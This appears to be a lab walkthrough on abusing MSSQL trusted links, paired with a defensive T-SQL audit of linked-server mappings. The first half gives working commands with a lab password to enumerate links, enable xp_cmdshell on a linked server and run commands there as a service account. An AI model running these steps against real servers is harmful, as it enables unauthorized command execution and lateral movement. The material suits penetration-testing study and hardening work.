MSSQL trusted links

  • Another SQL abuse we can try in the lab is the use of MSSQL trusted links.

Note that trusted links are also a forest-to-forest technique.

  • To abuse the links, let's connect as elena.lopez and use enum_links:

mssqlclient.py -windows-auth north.newyork.local/elena.lopez:princesa1@yonkers.north.newyork.local -show
enum_links
  • This runs the following queries:

EXEC sp_linkedservers
EXEC sp_helplinkedsrvlogin
  • As we can see, a linked server exists with the name Salisbury, and a mapping exists between the user Elena.Lopez and sa on Salisbury.

  • If we use the link we can get a command injection on Salisbury:

use_link Salisbury
enable_xp_cmdshell
xp_cmdshell whoami
  • This runs the following MSSQL commands:

EXEC ('select system_user as "username"') AT Salisbury
EXEC ('exec master.dbo.sp_configure ''show advanced options'',1;RECONFIGURE;exec master.dbo.sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT Salisbury
EXEC ('exec master..xp_cmdshell ''whoami''') AT Salisbury
  • We got a command injection on Salisbury.Maryland.local as maryland\sql_svc.
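
The link and the Elena.Lopez to sa mapping shown above are the kind of configuration a DBA can find from the defensive side. The following T-SQL audit is an added example, not part of the original walkthrough; it uses only the standard catalog views sys.servers, sys.linked_logins, sys.server_principals and sys.configurations, and the wording of the finding labels is my own.

```sql
-- Added audit example (not from the original page). Run on every SQL Server instance.
-- 1) List linked servers with their login mappings and flag fixed remote logins.
SELECT
    s.name                                  AS linked_server,
    s.data_source,
    s.is_rpc_out_enabled,                   -- 1 = EXEC ('...') AT <link> is allowed
    s.is_data_access_enabled,
    COALESCE(p.name, '<all local logins>')  AS local_login,   -- local_principal_id 0 = default mapping
    ll.uses_self_credential,                -- 1 = the caller's own identity is passed through
    ll.remote_name                          AS remote_login,
    CASE
        WHEN ll.uses_self_credential = 0 AND LOWER(ll.remote_name) = 'sa'
            THEN 'HIGH: local login is mapped to sa on the remote instance'
        WHEN ll.uses_self_credential = 0 AND ll.local_principal_id = 0
            THEN 'REVIEW: every local login shares one fixed remote login'
        WHEN ll.uses_self_credential = 0
            THEN 'REVIEW: fixed remote login, check its roles on the remote side'
        ELSE 'INFO: self credential (caller identity is passed through)'
    END                                     AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p
    ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 2) Run on the instance the link points to: current state of the options
--    that the enable_xp_cmdshell step above changes.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
```

A HIGH row together with is_rpc_out_enabled = 1 describes exactly the Salisbury link used above; remapping the link to a low-privileged remote login, or disabling RPC out where it is not needed, removes that path.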
